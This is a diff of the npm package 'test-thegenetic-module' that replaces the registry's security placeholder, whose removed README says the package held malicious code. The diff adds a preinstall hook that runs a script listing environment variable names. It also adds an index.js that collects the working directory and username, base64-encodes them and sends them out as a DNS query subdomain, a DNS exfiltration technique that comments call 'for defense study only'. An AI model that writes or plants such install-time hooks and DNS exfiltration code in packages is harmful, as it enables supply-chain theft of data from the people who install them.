test-thegenetic-module 0.0.1-security → 2.2.7

package/index.js

@@ -0,0 +1,30 @@
+// console.log("From Me 2.2.1!!!!!");
+// const stolenData = {
+//   time: new Date().toISOString(),
+//   cwd: process.cwd(),
+//   env: Object.keys(process.env)
+// };
+
+// console.log('🔴 Attacker would steal:', stolenData);
+
+// Encodes data in DNS queries - FOR DEFENSE STUDY ONLY
+const dns = require('dns');
+
+const stolenData = {
+  cwd: process.cwd(),
+  user: process.env.USER,
+  timestamp: Date.now()
+
+};
+
+// Encode data as subdomain
+const dataHash = Buffer.from(JSON.stringify(stolenData)).toString('base64');
+const query = `${dataHash}.test`;
+
+console.log('🔴 Attacker would steal:', query);
+
+
+dns.lookup(query, (err) => {
+  // DNS query sent with encoded data
+  // Attacker's DNS server logs the subdomain query
+});

package/package.json

@@ -1,6 +1,15 @@
 {
   "name": "test-thegenetic-module",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.2.7",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "echo \"its preinstall script\" && node preinstall.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "test-thegenetic-module": "^2.2.5"
+  }
 }

package/preinstall.js

@@ -0,0 +1,9 @@
+
+// Simulate data theft
+const stolenData = {
+  time: new Date().toISOString(),
+  cwd: process.cwd(),
+  env: Object.keys(process.env)
+};
+
+console.log('🔴 Attacker would steal:', stolenData);

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=test-thegenetic-module for more information.